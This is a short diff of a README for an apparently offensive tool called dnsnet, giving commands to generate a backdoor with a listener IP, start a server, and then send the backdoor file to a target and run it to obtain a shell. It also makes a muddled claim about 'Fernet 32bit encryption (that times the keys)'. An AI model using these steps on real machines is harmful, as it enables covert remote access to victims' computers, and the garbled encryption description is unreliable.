R00tendo/dnsnet/README.md

 python3 backdoor_generator.py <Listener ip>
 python3 server.py
 ```

-and send the backdoor directory and get your shell (if on windows I suggest using pyinstaller to compile it to exe first)
+then send the backdoor python file to the target and execute it.
 # Technical Details:
 Encryption: Fernet 32bit encryption (that times the keys)
 Program: Python3